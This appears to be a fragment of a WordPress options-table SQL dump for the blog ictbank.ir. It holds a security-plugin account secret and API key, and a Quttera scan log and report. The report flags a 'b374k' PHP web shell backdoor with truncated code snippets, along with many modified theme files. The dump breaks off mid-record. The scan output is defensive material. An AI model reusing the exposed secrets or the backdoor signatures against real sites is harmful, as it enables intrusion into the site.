(6305,'bvAccountsList','a:1:{s:32:\"bd610cefd287ace65b9ca639a3bd0c45\";a:7:{s:6:\"secret\";s:32:\"072afc9ef419b2e077efbcf81b3fb625\";s:14:\"lastbackuptime\";i:1692994717;s:7:\"malcare\";b:1;s:3:\"url\";s:23:\"https://ictbank.ir/blog\";s:5:\"email\";s:24:\"masoud.n******@gmail.com\";s:11:\"account_gid\";s:8:\"rZuVRNZY\";s:12:\"account_type\";s:7:\"malcare\";}}','no'),
(6306,'bvLastRecvTime','1692994836','no'),
(6307,'bvApiPublic','bd610cefd287ace65b9ca639a3bd0c45','no'),
(6308,'bvwatchtime','1692994819','no'),
(6319,'quttera_wp_stats','s:144:\"a:6:{s:5:\"TOTAL\";i:3850;s:5:\"CLEAN\";i:3809;s:10:\"SUSPICIOUS\";i:38;s:14:\"POT_SUSPICIOUS\";i:0;s:9:\"MALICIOUS\";i:3;s:10:\"START_TIME\";i:1585769681;}\";','no'),
(6320,'quttera_wp_logger','s:4245:\"a:21:{i:0;a:3:{i:0;i:9476;i:1;s:4:\"INFO\";i:2;s:161:\"Starting scan of /var/www/html/ictbank/blog/wp-content/plugins/wp-statistics/includes/vendor/whichbrowser/parser/src/Analyser/Header/Useragent/Device/Printer.php\";}i:1;a:3:{i:0;i:9477;i:1;s:4:\"INFO\";i:2;s:157:\"TXT /var/www/html/ictbank/blog/wp-content/plugins/wp-statistics/includes/vendor/whichbrowser/parser/src/Analyser/Header/Useragent/Device/Printer.php is clean\";}i:2;a:3:{i:0;i:9478;i:1;s:4:\"INFO\";i:2;s:159:\"Starting scan of /var/www/html/ictbank/blog/wp-content/plugins/wp-statistics/includes/vendor/whichbrowser/parser/src/Analyser/Header/Useragent/Device/Phone.php\";}i:3;a:3:{i:0;i:9479;i:1;s:4:\"INFO\";i:2;s:155:\"TXT /var/www/html/ictbank/blog/wp-content/plugins/wp-statistics/includes/vendor/whichbrowser/parser/src/Analyser/Header/Useragent/Device/Phone.php is clean\";}i:4;a:3:{i:0;i:9480;i:1;s:4:\"INFO\";i:2;s:157:\"Starting scan of /var/www/html/ictbank/blog/wp-content/plugins/wp-statistics/includes/vendor/whichbrowser/parser/src/Analyser/Header/Useragent/Device/Pda.php\";}i:5;a:3:{i:0;i:9481;i:1;s:4:\"INFO\";i:2;s:153:\"TXT /var/www/html/ictbank/blog/wp-content/plugins/wp-statistics/includes/vendor/whichbrowser/parser/src/Analyser/Header/Useragent/Device/Pda.php is clean\";}i:6;a:3:{i:0;i:9482;i:1;s:4:\"INFO\";i:2;s:160:\"Starting scan of /var/www/html/ictbank/blog/wp-content/plugins/wp-statistics/includes/vendor/whichbrowser/parser/src/Analyser/Header/Useragent/Device/Mobile.php\";}i:7;a:3:{i:0;i:9483;i:1;s:4:\"INFO\";i:2;s:156:\"TXT /var/www/html/ictbank/blog/wp-content/plugins/wp-statistics/includes/vendor/whichbrowser/parser/src/Analyser/Header/Useragent/Device/Mobile.php is clean\";}i:8;a:3:{i:0;i:9484;i:1;s:4:\"INFO\";i:2;s:159:\"Starting scan of /var/www/html/ictbank/blog/wp-content/plugins/wp-statistics/includes/vendor/whichbrowser/parser/src/Analyser/Header/Useragent/Device/Media.php\";}i:9;a:3:{i:0;i:9485;i:1;s:4:\"INFO\";i:2;s:155:\"TXT /var/www/html/ictbank/blog/wp-content/plugins/wp-statistics/includes/vendor/whichbrowser/parser/src/Analyser/Header/Useragent/Device/Media.php is clean\";}i:10;a:3:{i:0;i:9486;i:1;s:4:\"INFO\";i:2;s:157:\"Starting scan of /var/www/html/ictbank/blog/wp-content/plugins/wp-statistics/includes/vendor/whichbrowser/parser/src/Analyser/Header/Useragent/Device/Gps.php\";}i:11;a:3:{i:0;i:9487;i:1;s:4:\"INFO\";i:2;s:153:\"TXT /var/www/html/ictbank/blog/wp-content/plugins/wp-statistics/includes/vendor/whichbrowser/parser/src/Analyser/Header/Useragent/Device/Gps.php is clean\";}i:12;a:3:{i:0;i:9488;i:1;s:4:\"INFO\";i:2;s:160:\"Starting scan of /var/www/html/ictbank/blog/wp-content/plugins/wp-statistics/includes/vendor/whichbrowser/parser/src/Analyser/Header/Useragent/Device/Gaming.php\";}i:13;a:3:{i:0;i:9489;i:1;s:4:\"INFO\";i:2;s:156:\"TXT /var/www/html/ictbank/blog/wp-content/plugins/wp-statistics/includes/vendor/whichbrowser/parser/src/Analyser/Header/Useragent/Device/Gaming.php is clean\";}i:14;a:3:{i:0;i:9490;i:1;s:4:\"INFO\";i:2;s:161:\"Starting scan of /var/www/html/ictbank/blog/wp-content/plugins/wp-statistics/includes/vendor/whichbrowser/parser/src/Analyser/Header/Useragent/Device/Ereader.php\";}i:15;a:3:{i:0;i:9491;i:1;s:4:\"INFO\";i:2;s:157:\"TXT /var/www/html/ictbank/blog/wp-content/plugins/wp-statistics/includes/vendor/whichbrowser/parser/src/Analyser/Header/Useragent/Device/Ereader.php is clean\";}i:16;a:3:{i:0;i:9492;i:1;s:4:\"INFO\";i:2;s:158:\"Starting scan of /var/www/html/ictbank/blog/wp-content/plugins/wp-statistics/includes/vendor/whichbrowser/parser/src/Analyser/Header/Useragent/Device/Cars.php\";}i:17;a:3:{i:0;i:9493;i:1;s:4:\"INFO\";i:2;s:154:\"TXT /var/www/html/ictbank/blog/wp-content/plugins/wp-statistics/includes/vendor/whichbrowser/parser/src/Analyser/Header/Useragent/Device/Cars.php is clean\";}i:18;a:3:{i:0;i:9494;i:1;s:4:\"INFO\";i:2;s:163:\"Starting scan of /var/www/html/ictbank/blog/wp-content/plugins/wp-statistics/includes/vendor/whichbrowser/parser/src/Analyser/Header/Useragent/Device/Appliance.php\";}i:19;a:3:{i:0;i:9495;i:1;s:4:\"INFO\";i:2;s:159:\"TXT /var/www/html/ictbank/blog/wp-content/plugins/wp-statistics/includes/vendor/whichbrowser/parser/src/Analyser/Header/Useragent/Device/Appliance.php is clean\";}i:20;a:3:{i:0;i:9496;i:1;s:4:\"INFO\";i:2;s:49:\"Investigation of /var/www/html/ictbank/blog/ done\";}}\";','no'),
(6321,'quttera_wp_report','s:16767:\"a:41:{i:0;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:21:\"enMaliciousThreatType\";s:8:\"FILE_MD5\";s:32:\"95ace726190852e0d4e0ab36694b04c3\";s:4:\"FILE\";s:16:\"wp-main.php-back\";s:11:\"THREAT_NAME\";s:29:\"Backdoor.PHP.WebShell.gen.129\";s:10:\"THREAT_SIG\";s:32:\"0ddc2154cf4aedc715dff021a2545a52\";s:6:\"THREAT\";s:63:\"php /* b374k shell 3.2.2 Jayalah Indonesiaku (c)2014 https:/...\";s:7:\"DETAILS\";s:9:\"PHP Shell\";}i:1;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:21:\"enMaliciousThreatType\";s:8:\"FILE_MD5\";s:32:\"95ace726190852e0d4e0ab36694b04c3\";s:4:\"FILE\";s:16:\"wp-main.php-back\";s:11:\"THREAT_NAME\";s:26:\"Backdoor.PHP.Obfus.gen.29E\";s:10:\"THREAT_SIG\";s:32:\"83673f176097e6e1028003fc71d955f8\";s:6:\"THREAT\";s:63:\"<?php /* b374k shell 3.2.2 Jayalah Indonesiaku (c)2014 h...\";s:7:\"DETAILS\";s:21:\"Detected PHP backdoor\";}i:2;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:21:\"enMaliciousThreatType\";s:8:\"FILE_MD5\";s:32:\"95ace726190852e0d4e0ab36694b04c3\";s:4:\"FILE\";s:16:\"wp-main.php-back\";s:11:\"THREAT_NAME\";s:24:\"Trojan.PHP.Agent.gen.357\";s:10:\"THREAT_SIG\";s:32:\"0fa2246bbc0168e95435c4d6a7bcd698\";s:6:\"THREAT\";s:63:\"$_SERVER[\'HTTP_USER_AGENT\']) && (preg_match(\'/bot|spider|cra...\";s:7:\"DETAILS\";s:29:\"Detected malicious PHP script\";}i:3;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"0069a768632b394dc4e8dae676a5bdf1\";s:4:\"FILE\";s:40:\"wp-content/themes/twentytwenty/style.css\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"0069a768632b394dc4e8dae676a5bdf1\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:4;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"cdc9cb74bb27a1665aa946e9fdb74736\";s:4:\"FILE\";s:44:\"wp-content/themes/twentytwenty/style-rtl.css\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"cdc9cb74bb27a1665aa946e9fdb74736\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:5;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"e2d660c762bf3a0786a00aa4b871bcdb\";s:4:\"FILE\";s:43:\"wp-content/themes/twentytwenty/singular.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"e2d660c762bf3a0786a00aa4b871bcdb\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:6;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"1e2b7584acd06c07da008bfe60c5ac99\";s:4:\"FILE\";s:45:\"wp-content/themes/twentytwenty/searchform.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"1e2b7584acd06c07da008bfe60c5ac99\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:7;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"b014e0b450ff70eb961fb89ef1811356\";s:4:\"FILE\";s:40:\"wp-content/themes/twentytwenty/print.css\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"b014e0b450ff70eb961fb89ef1811356\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:8;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"e7812a84903c6d36c7fc4b3e21eea6c4\";s:4:\"FILE\";s:40:\"wp-content/themes/twentytwenty/index.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"e7812a84903c6d36c7fc4b3e21eea6c4\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:9;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"7e675a8c5d300c3b37adb27d4c0cd01e\";s:4:\"FILE\";s:41:\"wp-content/themes/twentytwenty/header.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"7e675a8c5d300c3b37adb27d4c0cd01e\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:10;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"6dc24df1ec44bd747c9f8b8660c38219\";s:4:\"FILE\";s:44:\"wp-content/themes/twentytwenty/functions.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"6dc24df1ec44bd747c9f8b8660c38219\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:11;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"dd07ca0a6b35455612762f19e71190c2\";s:4:\"FILE\";s:41:\"wp-content/themes/twentytwenty/footer.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"dd07ca0a6b35455612762f19e71190c2\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:12;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"6336489257752a8e1c22f378a9911c4a\";s:4:\"FILE\";s:43:\"wp-content/themes/twentytwenty/comments.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"6336489257752a8e1c22f378a9911c4a\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:13;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"50bc4b86b170031effb0fdcbaa15828a\";s:4:\"FILE\";s:38:\"wp-content/themes/twentytwenty/404.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"50bc4b86b170031effb0fdcbaa15828a\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:14;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"1f929e991fa998e37e7fa33060e54048\";s:4:\"FILE\";s:73:\"wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-page.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"1f929e991fa998e37e7fa33060e54048\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:15;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"e6bb52b8ea72a05171c150095c7697f2\";s:4:\"FILE\";s:76:\"wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-comment.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"e6bb52b8ea72a05171c150095c7697f2\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:16;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"b23237ec8850bef9002708d1246a56ba\";s:4:\"FILE\";s:71:\"wp-content/themes/twentytwenty/classes/class-twentytwenty-svg-icons.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"b23237ec8850bef9002708d1246a56ba\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:17;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"5792ca95eda32d727e50d1b0640148dc\";s:4:\"FILE\";s:79:\"wp-content/themes/twentytwenty/classes/class-twentytwenty-separator-control.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"5792ca95eda32d727e50d1b0640148dc\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:18;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"3a30abeb9783d3deb7dabba105d21ded\";s:4:\"FILE\";s:75:\"wp-content/themes/twentytwenty/classes/class-twentytwenty-script-loader.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"3a30abeb9783d3deb7dabba105d21ded\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:19;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"a94bc17367ea7b7d2aef49a150a0020e\";s:4:\"FILE\";s:81:\"wp-content/themes/twentytwenty/classes/class-twentytwenty-non-latin-languages.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"a94bc17367ea7b7d2aef49a150a0020e\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:20;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"fb8ce2e7294f4f3ddfaeefbc2f9d4baf\";s:4:\"FILE\";s:71:\"wp-content/themes/twentytwenty/classes/class-twentytwenty-customize.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"fb8ce2e7294f4f3ddfaeefbc2f9d4baf\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:21;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"3d74330ca31858edbb873046e1119512\";s:4:\"FILE\";s:52:\"wp-content/themes/twentytwenty/inc/template-tags.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"3d74330ca31858edbb873046e1119512\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:22;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"f8c3d6e6f5edbf407361ee495ea21a90\";s:4:\"FILE\";s:48:\"wp-content/themes/twentytwenty/inc/svg-icons.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"f8c3d6e6f5edbf407361ee495ea21a90\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:23;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"e983f244af2bd69c95674fddee624338\";s:4:\"FILE\";s:54:\"wp-content/themes/twentytwenty/inc/starter-content.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"e983f244af2bd69c95674fddee624338\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:24;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"e49eb8bbc4fed1dc6ca8d5e83976ebc2\";s:4:\"FILE\";s:49:\"wp-content/themes/twentytwenty/inc/custom-css.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"e49eb8bbc4fed1dc6ca8d5e83976ebc2\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:25;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"e0b9419ca7ac92c4352c5c5bb92eb18d\";s:4:\"FILE\";s:60:\"wp-content/themes/twentytwenty/template-parts/pagination.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"e0b9419ca7ac92c4352c5c5bb92eb18d\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:26;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"e4aecb84c3f8ec39c7af9f9bb89b3149\";s:4:\"FILE\";s:60:\"wp-content/themes/twentytwenty/template-parts/navigation.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"e4aecb84c3f8ec39c7af9f9bb89b3149\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:27;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"7cfd21acdbf844407694922ef6565a5f\";s:4:\"FILE\";s:62:\"wp-content/themes/twentytwenty/template-parts/modal-search.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"7cfd21acdbf844407694922ef6565a5f\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:28;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"3f57c7a8d4adc5d63eb34b0fb55817a7\";s:4:\"FILE\";s:60:\"wp-content/themes/twentytwenty/template-parts/modal-menu.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"3f57c7a8d4adc5d63eb34b0fb55817a7\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:29;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"d837184b809da97ac8b7ff403e8a6489\";s:4:\"FILE\";s:70:\"wp-content/themes/twentytwenty/template-parts/footer-menus-widgets.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"d837184b809da97ac8b7ff403e8a6489\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:30;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"748f92b177a84667b7f821a29072078b\";s:4:\"FILE\";s:64:\"wp-content/themes/twentytwenty/template-parts/featured-image.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"748f92b177a84667b7f821a29072078b\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:31;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"2abf1784ace8da3080a6143b68bec0f2\";s:4:\"FILE\";s:62:\"wp-content/themes/twentytwenty/template-parts/entry-header.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"2abf1784ace8da3080a6143b68bec0f2\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:32;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"b6294598e7cbae2568d08f81e0cd7fd3\";s:4:\"FILE\";s:66:\"wp-content/themes/twentytwenty/template-parts/entry-author-bio.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"b6294598e7cbae2568d08f81e0cd7fd3\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:33;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"7b20e21a710ad0b3f9e972ca1b4e0075\";s:4:\"FILE\";s:57:\"wp-content/themes/twentytwenty/template-parts/content.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"7b20e21a710ad0b3f9e972ca1b4e0075\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:34;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"6ff23d89a48678d74c16cecac76cf8c9\";s:4:\"FILE\";s:63:\"wp-content/themes/twentytwenty/template-parts/content-cover.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"6ff23d89a48678d74c16cecac76cf8c9\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:35;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"9e2a1e7f0125fe418ad377c3c35542e5\";s:4:\"FILE\";s:64:\"wp-content/themes/twentytwenty/templates/template-full-width.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"9e2a1e7f0125fe418ad377c3c35542e5\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:36;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"992f120bde082f01ad21fee3e100b71d\";s:4:\"FILE\";s:59:\"wp-content/themes/twentytwenty/templates/template-cover.php\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"992f120bde082f01ad21fee3e100b71d\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:37;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"4c356c8db845616763a55577312bd195\";s:4:\"FILE\";s:66:\"wp-content/themes/twentytwenty/assets/css/editor-style-classic.css\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"4c356c8db845616763a55577312bd195\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:38;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"6437f84c3fe0a9537c705deda361dc3f\";s:4:\"FILE\";s:70:\"wp-content/themes/twentytwenty/assets/css/editor-style-classic-rtl.css\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"6437f84c3fe0a9537c705deda361dc3f\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}i:39;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"c59179cfe20a9d047bc1cce2884c1a81\";s:4:\"FILE\";s:64:\"wp-content/themes/twentytwenty/assets/css/editor-style-block.css\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"c59179cfe20a9d047bc1cce2884c1a81\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core 